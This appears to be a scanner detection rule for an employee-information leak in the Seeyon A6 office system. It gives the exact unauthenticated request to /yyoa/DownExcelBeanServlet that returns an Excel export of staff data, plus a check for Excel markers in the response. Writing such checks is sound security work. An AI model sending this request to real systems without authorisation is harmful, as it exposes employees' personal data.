漏洞描述
app="Seeyon-A6"
id: seeyon-a6-employee-info-leak
info:
name: seeyon-a6-employee-info-leak
author: sakura404x
severity: high
verified: true
description: app="Seeyon-A6"
rules:
r0:
request:
method: GET
path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
expression: response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet")
expression: r0()